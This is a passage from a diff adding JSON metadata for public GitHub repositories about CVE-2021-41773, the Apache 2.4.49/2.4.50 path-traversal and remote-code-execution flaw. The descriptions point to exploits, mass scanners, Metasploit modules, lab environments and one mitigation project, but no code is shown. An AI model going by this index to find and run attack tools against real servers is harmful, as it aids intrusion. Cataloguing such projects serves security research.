+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77762068?v=4",
+ "html_url": "https:\/\/github.com\/vida003"
+ },
+ "html_url": "https:\/\/github.com\/vida003\/Scanner-CVE-2021-41773",
+ "description": "A automatic scanner to apache 2.4.49",
+ "fork": false,
+ "created_at": "2021-10-25T21:34:08Z",
+ "updated_at": "2021-10-25T22:17:23Z",
+ "pushed_at": "2021-10-25T22:17:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 421530564,
+ "name": "CVE-2021-41773",
+ "full_name": "mr-exo\/CVE-2021-41773",
+ "owner": {
+ "login": "mr-exo",
+ "id": 76655540,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76655540?v=4",
+ "html_url": "https:\/\/github.com\/mr-exo"
+ },
+ "html_url": "https:\/\/github.com\/mr-exo\/CVE-2021-41773",
+ "description": "Remote Code Execution exploit for Apache servers. Affected versions: Apache 2.4.49, Apache 2.4.50",
+ "fork": false,
+ "created_at": "2021-10-26T17:56:25Z",
+ "updated_at": "2024-02-21T19:30:18Z",
+ "pushed_at": "2021-10-26T18:04:43Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 422466104,
+ "name": "CVE-2021-41773",
+ "full_name": "wolf1892\/CVE-2021-41773",
+ "owner": {
+ "login": "wolf1892",
+ "id": 24608781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24608781?v=4",
+ "html_url": "https:\/\/github.com\/wolf1892"
+ },
+ "html_url": "https:\/\/github.com\/wolf1892\/CVE-2021-41773",
+ "description": "Setup vulnerable enviornment",
+ "fork": false,
+ "created_at": "2021-10-29T06:31:57Z",
+ "updated_at": "2021-10-29T06:33:41Z",
+ "pushed_at": "2021-10-29T06:33:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 424762276,
+ "name": "CVE-2021-41773-Playground",
+ "full_name": "Hydragyrum\/CVE-2021-41773-Playground",
+ "owner": {
+ "login": "Hydragyrum",
+ "id": 4928181,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4928181?v=4",
+ "html_url": "https:\/\/github.com\/Hydragyrum"
+ },
+ "html_url": "https:\/\/github.com\/Hydragyrum\/CVE-2021-41773-Playground",
+ "description": "Some docker images to play with CVE-2021-41773 and CVE-2021-42013",
+ "fork": false,
+ "created_at": "2021-11-04T22:52:44Z",
+ "updated_at": "2022-11-25T07:03:08Z",
+ "pushed_at": "2021-11-04T22:56:14Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 426066790,
+ "name": "Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit",
+ "full_name": "IcmpOff\/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit",
+ "owner": {
+ "login": "IcmpOff",
+ "id": 71145797,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71145797?v=4",
+ "html_url": "https:\/\/github.com\/IcmpOff"
+ },
+ "html_url": "https:\/\/github.com\/IcmpOff\/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit",
+ "description": "This Metasploit module exploits an unauthenticated remote code execution vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by ‘require all denied’ and CGI has been explicitly enabled, it can be used to execute arbitrary commands. This vulnerability has been reintroduced in the Apache 2.4.50 fix (CVE-2021-42013).",
+ "fork": false,
+ "created_at": "2021-11-09T02:38:13Z",
+ "updated_at": "2021-11-09T02:42:52Z",
+ "pushed_at": "2021-11-09T02:39:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "exploit",
+ "metasploit",
+ "metasploit-framework",
+ "metasploit-modules",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 427005450,
+ "name": "CVE-2021-41773",
+ "full_name": "pirenga\/CVE-2021-41773",
+ "owner": {
+ "login": "pirenga",
+ "id": 10979104,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10979104?v=4",
+ "html_url": "https:\/\/github.com\/pirenga"
+ },
+ "html_url": "https:\/\/github.com\/pirenga\/CVE-2021-41773",
+ "description": "Ce programme permet de détecter une faille RCE sur les serveurs Apache 2.4.49 et Apache 2.4.50",
+ "fork": false,
+ "created_at": "2021-11-11T13:10:05Z",
+ "updated_at": "2023-09-28T11:33:10Z",
+ "pushed_at": "2021-11-11T00:48:37Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 427815832,
+ "name": "POC-CVE-2021-41773",
+ "full_name": "kubota\/POC-CVE-2021-41773",
+ "owner": {
+ "login": "kubota",
+ "id": 119277,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119277?v=4",
+ "html_url": "https:\/\/github.com\/kubota"
+ },
+ "html_url": "https:\/\/github.com\/kubota\/POC-CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-14T02:02:45Z",
+ "updated_at": "2021-11-16T20:42:27Z",
+ "pushed_at": "2021-11-16T20:42:25Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 427956449,
+ "name": "CVE-2021-41773",
+ "full_name": "xMohamed0\/CVE-2021-41773",
+ "owner": {
+ "login": "xMohamed0",
+ "id": 94008154,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94008154?v=4",
+ "html_url": "https:\/\/github.com\/xMohamed0"
+ },
+ "html_url": "https:\/\/github.com\/xMohamed0\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-14T14:50:45Z",
+ "updated_at": "2021-11-14T14:55:20Z",
+ "pushed_at": "2021-11-14T14:55:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438514241,
+ "name": "MASS_CVE-2021-41773",
+ "full_name": "i6c\/MASS_CVE-2021-41773",
+ "owner": {
+ "login": "i6c",
+ "id": 87837042,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87837042?v=4",
+ "html_url": "https:\/\/github.com\/i6c"
+ },
+ "html_url": "https:\/\/github.com\/i6c\/MASS_CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-15T06:04:41Z",
+ "updated_at": "2023-09-28T11:34:08Z",
+ "pushed_at": "2021-12-15T06:06:53Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 447314257,
+ "name": "CVE-2021-41773-exploiter",
+ "full_name": "norrig\/CVE-2021-41773-exploiter",
+ "owner": {
+ "login": "norrig",
+ "id": 5526261,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5526261?v=4",
+ "html_url": "https:\/\/github.com\/norrig"
+ },
+ "html_url": "https:\/\/github.com\/norrig\/CVE-2021-41773-exploiter",
+ "description": "School project - Please use other repos for actual testing",
+ "fork": false,
+ "created_at": "2022-01-12T17:42:36Z",
+ "updated_at": "2022-01-12T18:26:57Z",
+ "pushed_at": "2022-01-13T16:18:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452242021,
+ "name": "CVE-2021-41773-exercise",
+ "full_name": "m96dg\/CVE-2021-41773-exercise",
+ "owner": {
+ "login": "m96dg",
+ "id": 65173648,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65173648?v=4",
+ "html_url": "https:\/\/github.com\/m96dg"
+ },
+ "html_url": "https:\/\/github.com\/m96dg\/CVE-2021-41773-exercise",
+ "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and not earlier versions. Credits to: https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-41773 ",
+ "fork": false,
+ "created_at": "2022-01-26T11:02:46Z",
+ "updated_at": "2022-01-26T11:22:13Z",
+ "pushed_at": "2022-01-30T19:02:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 464271089,
+ "name": "CVE-2021-41773",
+ "full_name": "skentagon\/CVE-2021-41773",
+ "owner": {
+ "login": "skentagon",
+ "id": 49702576,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49702576?v=4",
+ "html_url": "https:\/\/github.com\/skentagon"
+ },
+ "html_url": "https:\/\/github.com\/skentagon\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-27T22:39:58Z",
+ "updated_at": "2022-03-04T00:11:58Z",
+ "pushed_at": "2022-03-04T00:05:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 467687901,
+ "name": "CVE-2021-41773",
+ "full_name": "mauricelambert\/CVE-2021-41773",
+ "owner": {
+ "login": "mauricelambert",
+ "id": 50479118,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4",
+ "html_url": "https:\/\/github.com\/mauricelambert"
+ },
+ "html_url": "https:\/\/github.com\/mauricelambert\/CVE-2021-41773",
+ "description": "These Metasploit, Nmap, Python and Ruby scripts detects and exploits CVE-2021-41773 with RCE and local file disclosure.",
+ "fork": false,
+ "created_at": "2022-03-08T21:55:53Z",
+ "updated_at": "2022-03-23T16:56:34Z",
+ "pushed_at": "2022-03-14T07:34:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-41773",
+ "detection",
+ "exploit",
+ "metasploit",
+ "nmap",
+ "python3",
+ "rce",
+ "ruby",
+ "scanner",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 468909402,
+ "name": "CVE-2021-41773",
+ "full_name": "the29a\/CVE-2021-41773",
+ "owner": {
+ "login": "the29a",
+ "id": 4436697,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4436697?v=4",
+ "html_url": "https:\/\/github.com\/the29a"
+ },
+ "html_url": "https:\/\/github.com\/the29a\/CVE-2021-41773",
+ "description": "Small PoC of CVE-2021-41773",
+ "fork": false,
+ "created_at": "2022-03-11T21:50:35Z",
+ "updated_at": "2022-03-11T21:52:35Z",
+ "pushed_at": "2022-03-11T22:10:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 469203660,
+ "name": "CVE-2021-41773",
+ "full_name": "thehackersbrain\/CVE-2021-41773",
+ "owner": {
+ "login": "thehackersbrain",
+ "id": 36809025,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36809025?v=4",
+ "html_url": "https:\/\/github.com\/thehackersbrain"
+ },
+ "html_url": "https:\/\/github.com\/thehackersbrain\/CVE-2021-41773",
+ "description": "Apache2 2.4.49 - LFI & RCE Exploit - CVE-2021-41773",
+ "fork": false,
+ "created_at": "2022-03-12T21:24:55Z",
+ "updated_at": "2024-06-11T19:11:57Z",
+ "pushed_at": "2022-03-12T21:30:58Z",
+ "stargazers_count": 93,
+ "watchers_count": 93,
+ "has_discussions": false,
+ "forks_count": 32,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache2",
+ "cve-2021-41773",
+ "exploit",
+ "gauravraj",
+ "lfi",
+ "python",
+ "rce",
+ "thehackersbrain"
+ ],
+ "visibility": "public",
+ "forks": 32,
+ "watchers": 93,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 469576020,
+ "name": "CVE-2021-41773",
+ "full_name": "honypot\/CVE-2021-41773",
+ "owner": {
+ "login": "honypot",
+ "id": 101309325,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101309325?v=4",
+ "html_url": "https:\/\/github.com\/honypot"
+ },
+ "html_url": "https:\/\/github.com\/honypot\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-14T04:08:56Z",
+ "updated_at": "2022-03-14T04:09:11Z",
+ "pushed_at": "2022-03-14T04:09:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 469821841,
+ "name": "CVE-2021-41773",
+ "full_name": "Fa1c0n35\/CVE-2021-41773",
+ "owner": {
+ "login": "Fa1c0n35",
+ "id": 33335488,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33335488?v=4",
+ "html_url": "https:\/\/github.com\/Fa1c0n35"
+ },
+ "html_url": "https:\/\/github.com\/Fa1c0n35\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-14T16:43:49Z",
+ "updated_at": "2022-03-14T16:44:00Z",
+ "pushed_at": "2022-03-14T16:43:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 474963195,
+ "name": "CVE-2021-41773",
+ "full_name": "puckiestyle\/CVE-2021-41773",
+ "owner": {
+ "login": "puckiestyle",
+ "id": 57447087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4",
+ "html_url": "https:\/\/github.com\/puckiestyle"
+ },
+ "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-28T11:02:46Z",
+ "updated_at": "2022-03-28T11:03:00Z",
+ "pushed_at": "2022-03-28T11:41:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 475931011,
+ "name": "CVE-2021-41773",
+ "full_name": "zer0qs\/CVE-2021-41773",
+ "owner": {
+ "login": "zer0qs",
+ "id": 83699106,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83699106?v=4",
+ "html_url": "https:\/\/github.com\/zer0qs"
+ },
+ "html_url": "https:\/\/github.com\/zer0qs\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-30T15:04:27Z",
+ "updated_at": "2022-03-30T17:46:13Z",
+ "pushed_at": "2022-04-14T21:54:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 476112666,
+ "name": "Reserch-CVE-2021-41773",
+ "full_name": "DoTuan1\/Reserch-CVE-2021-41773",
+ "owner": {
+ "login": "DoTuan1",
+ "id": 63194321,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63194321?v=4",
+ "html_url": "https:\/\/github.com\/DoTuan1"
+ },
+ "html_url": "https:\/\/github.com\/DoTuan1\/Reserch-CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-31T01:48:33Z",
+ "updated_at": "2022-03-31T01:54:45Z",
+ "pushed_at": "2022-03-31T03:03:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 477111512,
+ "name": "netsec-polygon",
+ "full_name": "bernardas\/netsec-polygon",
+ "owner": {
+ "login": "bernardas",
+ "id": 62701131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62701131?v=4",
+ "html_url": "https:\/\/github.com\/bernardas"
+ },
+ "html_url": "https:\/\/github.com\/bernardas\/netsec-polygon",
+ "description": "Environment for CVE-2021-41773 recreation.",
+ "fork": false,
+ "created_at": "2022-04-02T16:34:45Z",
+ "updated_at": "2022-04-03T08:19:39Z",
+ "pushed_at": "2022-05-17T22:16:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 477889492,
+ "name": "Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit",
+ "full_name": "CalfCrusher\/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit",
+ "owner": {
+ "login": "CalfCrusher",
+ "id": 5812023,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5812023?v=4",
+ "html_url": "https:\/\/github.com\/CalfCrusher"
+ },
+ "html_url": "https:\/\/github.com\/CalfCrusher\/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit",
+ "description": "CVE-2021-41773 | CVE-2021-42013 Exploit Tool (Apache\/2.4.49-2.4.50)",
+ "fork": false,
+ "created_at": "2022-04-04T22:07:21Z",
+ "updated_at": "2024-05-19T18:04:49Z",
+ "pushed_at": "2022-04-08T09:24:35Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-41773",
+ "cve-2021-42013",
+ "exploit"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 478605535,
+ "name": "cve-2021-41773",
+ "full_name": "vuongnv3389-sec\/cve-2021-41773",
+ "owner": {
+ "login": "vuongnv3389-sec",
+ "id": 64488431,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64488431?v=4",
+ "html_url": "https:\/\/github.com\/vuongnv3389-sec"
+ },
+ "html_url": "https:\/\/github.com\/vuongnv3389-sec\/cve-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-06T14:53:19Z",
+ "updated_at": "2022-04-06T14:54:12Z",
+ "pushed_at": "2022-04-06T15:41:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 480821526,
+ "name": "CVE-2021-41773",
+ "full_name": "Chocapikk\/CVE-2021-41773",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2021-41773",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-12T13:25:58Z",
+ "updated_at": "2023-12-19T12:10:14Z",
+ "pushed_at": "2022-04-12T13:26:22Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 486245191,
+ "name": "Apache_Penetration_Tool",
+ "full_name": "wangfly-me\/Apache_Penetration_Tool",
+ "owner": {
+ "login": "wangfly-me",
+ "id": 25388540,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25388540?v=4",
+ "html_url": "https:\/\/github.com\/wangfly-me"
+ },
+ "html_url": "https:\/\/github.com\/wangfly-me\/Apache_Penetration_Tool",
+ "description": "CVE-2021-41773&CVE-2021-42013图形化漏洞检测利用工具",
+ "fork": false,
+ "created_at": "2022-04-27T15:17:38Z",
+ "updated_at": "2024-06-21T00:10:01Z",
+ "pushed_at": "2023-05-22T16:00:49Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-41773",
+ "cve-2021-42013",
+ "exp"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 491353620,
+ "name": "CVE-2021-41773-Scanner",
+ "full_name": "anldori\/CVE-2021-41773-Scanner",
+ "owner": {
+ "login": "anldori",
+ "id": 101538840,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101538840?v=4",
+ "html_url": "https:\/\/github.com\/anldori"
+ },
+ "html_url": "https:\/\/github.com\/anldori\/CVE-2021-41773-Scanner",
+ "description": "CVE-2021-41773 Shodan scanner",
+ "fork": false,
+ "created_at": "2022-05-12T03:42:24Z",
+ "updated_at": "2022-05-12T03:42:49Z",
+ "pushed_at": "2022-05-12T03:44:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 491523422,
+ "name": "ApacheRCEEssay",
+ "full_name": "iosifache\/ApacheRCEEssay",
+ "owner": {
+ "login": "iosifache",
+ "id": 11766982,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11766982?v=4",
+ "html_url": "https:\/\/github.com\/iosifache"
+ },
+ "html_url": "https:\/\/github.com\/iosifache\/ApacheRCEEssay",
+ "description": "Essay (and PoCs) about CVE-2021-41773, a remote code execution vulnerability in Apache 2.4.49 🕸️",
+ "fork": false,
+ "created_at": "2022-05-12T13:23:08Z",
+ "updated_at": "2023-02-14T06:59:33Z",
+ "pushed_at": "2022-05-13T06:10:12Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-41773",
+ "cve-2021-41773-poc"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 500809753,
+ "name": "CVE-2021-41773",
+ "full_name": "Habib0x0\/CVE-2021-41773",
+ "owner": {
+ "login": "Habib0x0",
+ "id": 24976957,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24976957?v=4",
+ "html_url": "https:\/\/github.com\/Habib0x0"
+ },
+ "html_url": "https:\/\/github.com\/Habib0x0\/CVE-2021-41773",
+ "description": "CVE-2021-41773 | Apache HTTP Server 2.4.49 is vulnerable to Path Traversal and Remote Code execution attacks ",
+ "fork": false,
+ "created_at": "2022-06-07T11:22:08Z",
+ "updated_at": "2024-02-20T09:21:58Z",
+ "pushed_at": "2022-12-11T16:02:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 504547542,
+ "name": "CVE-2021-41773-Apache-RCE",
+ "full_name": "pwn3z\/CVE-2021-41773-Apache-RCE",
+ "owner": {
+ "login": "pwn3z",
+ "id": 71440287,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71440287?v=4",
+ "html_url": "https:\/\/github.com\/pwn3z"
+ },
+ "html_url": "https:\/\/github.com\/pwn3z\/CVE-2021-41773-Apache-RCE",
+ "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.",
+ "fork": false,
+ "created_at": "2022-06-17T13:36:42Z",
+ "updated_at": "2022-06-17T13:38:47Z",
+ "pushed_at": "2022-06-17T13:39:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 516684881,
+ "name": "Mitigation-Apache-CVE-2021-41773-",
+ "full_name": "EkamSinghWalia\/Mitigation-Apache-CVE-2021-41773-",
+ "owner": {
+ "login": "EkamSinghWalia",
+ "id": 106553324,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4",
+ "html_url": "https:\/\/github.com\/EkamSinghWalia"
+ },
+ "html_url": "https:\/\/github.com\/EkamSinghWalia\/Mitigation-Apache-CVE-2021-41773-",
+ "description": "Mitigation\/fix of CVE-2021-41773 A Path Traversal And File Disclosure Vulnerability In Apache",
+ "fork": false,
+ "created_at": "2022-07-22T09:11:47Z",
+ "updated_at": "2022-07-22T09:29:20Z",
+ "pushed_at": "2022-07-22T14:59:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
